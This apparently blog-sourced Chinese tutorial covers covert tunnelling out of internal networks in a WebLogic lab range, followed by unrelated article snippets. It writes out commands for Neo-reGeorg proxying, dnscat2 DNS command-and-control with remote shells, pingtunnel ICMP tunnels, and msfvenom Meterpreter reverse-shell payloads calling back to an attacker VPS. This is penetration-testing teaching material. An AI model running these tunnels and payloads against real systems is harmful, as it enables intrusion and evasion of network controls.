内网隧道—HTTP\DNS\ICMP
本文仅限于安全研究和学习,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任!
HTTP隧道
Neo-reGeorg
Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目,目的是:
提高可用性,避免特征检测
提高 tunnel 连接安全性
提高传输内容保密性
应对更多的网络环境场景下使用
靶场环境:cve-2017-10271 weblogic
#靶场攻击过程,使用脚本工具得到shell,在此略过
1.设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器
2.使用蚁剑上传JSP文件
上传至此目录:可以访问到文件
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/
3.使用 neoreg.py 连接WEB服务器,在本地建立 socks 代理,代理默认端口 1080
修改配置文件:vim proxychains4.conf
执行命令:
#测试代理: proxychains curl 127.0.0.1:7001
DNS隧道
Dnscat2
dnscat2是一个DNS隧道工具,通过DNS协议创建加密的命令和控制通道,它的一大
特色就是服务端会有一个命令行控制台,所有的指令都可以在该控制台内完成。包
括:文件上传、下载、反弹Shell。
直连模式:客户端直接向指定IP的恶意DNS服务器发起DNS解析请求。
中继模式:像我们平时上网一样,DNS解析先经过互联网的迭代解析,最后指向我们
的恶意DNS服务器。相比直连,速度较慢,但是更安全。
服务端安装
apt install ruby ruby-dev git make g++ ruby-bundler
gem install bundler
git clone https://github.com/iagox86/dnscat2.git(也可以先下载文件,然后上传至VPS)
cd dnscat2/server
bundle install #如此命令报错,和本地网络有关,多试几次
客户端编译
Linux:
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
makeWindows:
下载Windows版本
在本地编译上传
上传已经编译好的 .exe程序
make编译之后会在此目录下生成一个dnscat可执行二进制文件。
Linux systemd-resolve占用53端口的解决方法: https://www.itren.org/319.html
Dnscat2直连模式
启动服务端
ruby ./dnscat2.rb
启动客户端
vps收到会话
help
windows
进入session 1: session -i 1
shell #获取主机shell
进入session 2 : session -i 2
执行命令:
whoami
直连模式流量特征:tcpdump udp dst port 53
Dnscat2中继模式
环境准备:
1. 一台公网C&C服务器
2. 一台内网靶机 #以win7为例
3. 一个可配置解析的域名
配置DNS域名解析:
创建A记录,将自己的域名解析服务器(ns.hack.com)指向云服务器(VPS IP)A类解析是在告诉域名系统,ns.hacker.com的IP地址是 xxx.xxx.xxx.xxx
创建NS记录,将子域名 dns.hetian.cn 的DNS解析交给 ns.hack.com
NS解析是在告诉域名系统,想要知道 dns.hack.com 的IP地址,就去问ns.hacker.com
vps防火墙设置:开放全部UDP端口
启动服务端
ruby ./dnscat2.rb dns.xxx.xxx --secret=abcd
secret --指定密码
启动客户端
server #指定VPS地址
服务端收到session 3
获取shell
进入会话:session -i 4
执行命令: whoami
ICMP隧道
Pingtunnel
ICMP隧道
通过某种信道获取了内网主机的shell,但是当前信道不适合做远控的通信信道,
tcp 和 udp 等传输层协议不能出网, dns 、 http 等应用层协议也不能出网,只有
icmp 协议可以出网。
目的:上线仅icmp协议出网的内网主机
ICMP隧道转发TCP上线MSF
1.VPS启动ICMP隧道服务端
./pingtunnel -type server -noprint 1 -nolog 1
2.靶机启动ICMP隧道客户端
pingtunnel.exe -type client -l 127.0.0.1:9999 -s vpsip -t vpsip:7777 -tcp 1 -noprint 1 -nolog 1
3. MSF 生成反弹 shell 的 payload 上传到靶机
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1 lport=9999 -f exe > hot.exe
4.执行 payload 反弹 shell 到 MSF
设置侦听:
msfconsole
use exploit/multi/handler
set lhost xx.xx.xx.xx (vps的内网IP)
set lport 8866
set payload windows/x64/meterpreter/reverse_tcp
exploit
5. 靶机执行payload,msf上线
ICMP隧道转发Socks上线MSF
1. VPS启动ICMP隧道服务端
./pingtunnel -type server -noprint 1 -nolog 1
2.靶机启动ICMP隧道客户端
pingtunnel.exe -type client -l 127.0.0.1:9999 -s VPSIP -sock5 1 -noprint 1 -nolog 1
# icmp隧道客户端监听127.0.0.1:9999启动socks5服务,
通过连接到VPS IP的icmp隧道,
由icmpserver转发socks5代理请求到目的地址 VPSIP:8899
3.MSF 生成反弹 shell 的 payload 上传到靶机,并执行
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=VPSIP lport=8866 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=9999 -f exe > c2.exe
5.设置侦听
handler -p windows/x64/meterpreter/reverse_tcp -H xx.xx.xx.xx -P8866
#IP是vps的内网IP
6.MSF收到会话
可以执行命令
参考:
内网渗透之内网穿透 - 先知社区
...
相关文章:
内网隧道—HTTP\DNS\ICMP
本文仅限于安全研究和学习,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任! HTTP隧道 Neo-reGeorg Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目,目的是: 提高可用性࿰…...
QT mouseTracking
在Qt中要捕捉鼠标移动事件需要重写MouseMoveEvent,但是MouseMoveEvent为了不太耗资源在默认状态下是要鼠标按下才能捕捉到。要想鼠标不按下时的移动也能捕捉到,需要setMouseTracking(true)。 如果鼠标跟踪失效(默认),…...
java操作mongdb【超详细】
Java操作 搭建 搭建 依赖 <!--mongodb--><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-data-mongodb</artifactId></dependency>配置文件 spring:data:mongodb:host…...
JavaScript函数
什么是函数? 在 JavaScript 中,函数是一段被封装起来用于特定任务的可重复使用的代码块。 例如: function logger() {console.log(IT知识一享); }这样就创造了logger()函数,后续可以重复利用这个函数让它输出日志,后…...
RISC-V公测平台发布 · 使用YCSB测试SG2042上的MySQL性能
实验介绍: YCSB(全称为Yahoo! Cloud Serving Benchmark),该性能测试工具由Java语言编写(在之前的MC文章中也提到过这个,如果没看过的读者可以去看看之前MC那一期),主要用于云端或者…...
母婴即时零售行业数据可视化分析
对新晋父母来说,很多母婴用品如同一位贴心的助手,为他们的宝宝提供温暖和呵护。从婴儿床垫到可爱的拼图玩具,每一件用品都是为宝宝的成长和发展量身定制。对于繁忙的父母们而言,这些用品不仅帮助照顾孩子,更是为他们减…...
快速解决IDEA中类的图标变成J,不是C的情况
有时候导入新的项目后,会出现如下情况,类的图标变成J,如图: 直接上解决方法: 找到项目的pom.xml,右键,在靠近最下方的位置找到Add as Maven Project,点击即可。 此时,一般类的图标就…...
vue学习笔记
1.官网 v2官网 https://v2.cn.vuejs.org/ v3官网 https://cn.vuejs.org/ 2.vue引入 在线引入 <script src"https://cdn.jsdelivr.net/npm/vue2.7.14/dist/vue.js"></script> 下载引入(下载链接) https://v2.cn.vuejs.org/js/vue.js 3.初始化渲…...
难解的bug
android.app.RemoteServiceException: Context.startForegroundService() did not then call Service.startForeground(): ServiceRecord 【Android TimeCat】 解决 context.startforegroundservice() did not then call service.startforeground() | XiChens Blog http://www…...
人文景区有必要做VR云游吗?如何满足游客出行需求?
VR云游在旅游行业中的应用正在快速增长,为游客带来沉浸式体验的同时,也为文旅景区提供了新的营销方式。很多人说VR全景展示是虚假的,比不上真实的景区触感,人文景区真的有必要做VR云游吗?我的答案是很有必要。 如果你认…...
【字节跳动青训营】后端笔记整理-1 | Go语言入门指南:基础语法和常用特性解析
**本人是第六届字节跳动青训营(后端组)的成员。本文由博主本人整理自该营的日常学习实践,首发于稀土掘金:🔗Go语言入门指南:基础语法和常用特性解析 | 青训营 本文主要梳理自第六届字节跳动青训营ÿ…...
3.解构赋值
解构赋值是一种快速为变量赋值的简洁语法,本质上仍然是为变量赋值。 3.1数组解构 数组解构是 将数组的单元值快速批量赋值给一系列变量 的简洁语法 1.基本语法: (1)赋值运算符左侧的[ ]用于批量声明变量,右侧数组的单元值将被赋…...
ChatGPT在智能游戏和游戏AI中的应用如何?
ChatGPT在智能游戏和游戏AI领域具有广泛的应用潜力,可以为游戏体验增添智能和交互性,同时也有助于游戏开发者创造更丰富、更引人入胜的游戏内容。以下将详细探讨ChatGPT在智能游戏和游戏AI中的应用。 ## 1. 游戏角色的智能化 在角色扮演游戏࿰…...
【安卓串口通信】
安卓串口通信需要使用到串口适配器和USB OTG线。首先需要在Android设备上安装串口调试助手或其他支持串口通信的应用程序。然后将串口适配器连接到Android设备,使用USB OTG线连接即可。 接下来,您需要打开串口调试助手或其他应用程序,…...
电气测试相关
项目: 长期过电压 瞬态过电压 瞬态欠压 跳跃启动 卸载 纹波电压 电源电压缓慢下降和上升 电源电压缓慢下降、快速上升 复位行为 短暂中断 启动脉冲 带电气系统控制的电压曲线 引脚中断 连接器中断 反极性 信号线和负载电路短路 启动行为 对分流不…...
ProsperEx 的野望:借势 RWA 浪潮,构建全新的链上衍生品体系
真实资产代币化(RWA)并不是一个新概念了,以 USDT、USDC、DAI 等一系列美元稳定币是行业内最早的 RWA 概念资产,这些资产以美元为价值基础通过不同信用的机制,将其价值映射至链上,并以加密货币的形式体现&am…...
Spring Data JPA 详解
目录 一、概述1.1 JPA简介1.2 Spring Data JPA简介 二、配置及应用2.1 环境配置2.2 依赖添加2.3 实体类创建2.4 Repository接口创建2.5 示例程序运行 三、实体映射3.1 注解3.2 关系映射 四、Repository接口4.1 基本增删改查4.2 自定义查询方法4.3 使用 Sort 和 Pageable 进行排…...
NZ系列工具NZ02:VBA读取PDF使用说明
【分享成果,随喜正能量】时光绽放并蒂莲,更是一份殷殷嘱托,更是一份诚挚祝福,是一份时光馈赠,又是一份时光陪伴。。 我的教程一共九套及VBA汉英手册一部,分为初级、中级、高级三大部分。是对VBA的系统讲解…...
Autocasting和GradScaler
Autocasting和GradScaler是什么 torch.autocast 是一个上下文管理器,它可以将数据类型从 float32 自动转换为 float16。这可以提高性能,因为 float16 比 float32 更小,因此可以更快地处理。torch.cuda.amp.GradScaler 是一个类,它…...
头条移动端项目Day03 —— 自媒体素材管理、自媒体文章管理、自媒体文章发布
❤ 作者主页:欢迎来到我的技术博客😎 ❀ 个人介绍:大家好,本人热衷于Java后端开发,欢迎来交流学习哦!( ̄▽ ̄)~* 🍊 如果文章对您有帮助,记得关注、点赞、收藏、…...
RexUniNLU可部署方案:Docker镜像封装+FastAPI服务化生产环境落地教程
RexUniNLU可部署方案:Docker镜像封装FastAPI服务化生产环境落地教程 你是不是也遇到过这样的问题:想做一个智能客服或者信息提取工具,但一看到要标注成千上万条数据就头疼?标注成本高、周期长,而且换个业务场景&#…...
麦橘超然Flux图像生成控制台:从环境准备到生成测试的完整流程
麦橘超然Flux图像生成控制台:从环境准备到生成测试的完整流程 1. 引言 1.1 项目概述 麦橘超然Flux图像生成控制台是一款基于DiffSynth-Studio框架构建的AI绘画工具,集成了majicflus_v1模型,通过float8量化技术显著降低了显存需求。这个解决…...
RexUniNLU在电商场景实战:自动分析用户评论,提取产品属性与情感
RexUniNLU在电商场景实战:自动分析用户评论,提取产品属性与情感 1. 电商评论分析的痛点与解决方案 电商平台上每天产生海量用户评论,这些非结构化文本数据蕴含着宝贵的用户反馈。传统人工分析方式效率低下,而常规NLP方法又面临以…...
基于Qwen3-ASR-1.7B的语音搜索系统:Elasticsearch集成方案
基于Qwen3-ASR-1.7B的语音搜索系统:Elasticsearch集成方案 语音搜索正在改变我们获取信息的方式,但如何让机器准确理解语音内容并快速返回相关结果?本文将带你构建一个高效的语音搜索系统,结合Qwen3-ASR-1.7B的语音识别能力和Elas…...
零样本分类避坑指南:AI万能分类器使用中的注意事项与技巧
零样本分类避坑指南:AI万能分类器使用中的注意事项与技巧 1. 零样本分类技术概述 零样本分类(Zero-Shot Classification)是自然语言处理领域的一项突破性技术,它允许模型在没有特定任务训练数据的情况下,仅凭用户提供…...
【AI】从零到一:手把手搭建PyTorch+CUDA深度学习开发环境
1. 深度学习开发环境搭建全景图 刚接触深度学习的同学往往会被各种术语搞晕——显卡驱动、CUDA、cuDNN、PyTorch,这些组件之间到底什么关系?简单来说,它们就像盖房子的四层地基:显卡驱动是地基中的钢筋,CUDA是混凝土框…...
软件风险管理化的识别应对与监控
软件风险管理:识别、应对与监控的关键实践 在数字化时代,软件已成为企业运营的核心载体,但随之而来的风险也日益复杂。软件风险管理旨在通过系统化的方法识别潜在威胁、制定应对策略并持续监控风险变化,从而保障软件项目的顺利交…...
图图的嗨丝造相-Z-Image-Turbo教程:Xinference REST API对接Python脚本自动化生成流程
图图的嗨丝造相-Z-Image-Turbo教程:Xinference REST API对接Python脚本自动化生成流程 1. 引言:从手动点击到自动生成 如果你用过图图的嗨丝造相-Z-Image-Turbo这个模型,肯定体验过它的强大——输入一段描述,就能生成穿着大网渔…...
FPGA加速视觉处理——Canny边缘检测的硬件优化实践
1. Canny边缘检测的硬件加速需求 第一次接触Canny算法是在研究生时期的机器视觉课上,当时用OpenCV实现了一个简单的边缘检测程序。看着屏幕上实时显示的画面边缘,我就在想:这个算法要是能跑得更快该多好。后来接触到FPGA,才发现这…...
Linux内核与驱动:9.驱动中的中断机制
在 Linux 设备驱动开发中,中断处理是一个必须掌握的核心知识点。相比于轮询方式持续查询硬件状态,中断机制让驱动程序能够“按需响应”,即只有当硬件真正有事件需要处理时,CPU 才会被通知并执行相应的处理代码,从而大幅…...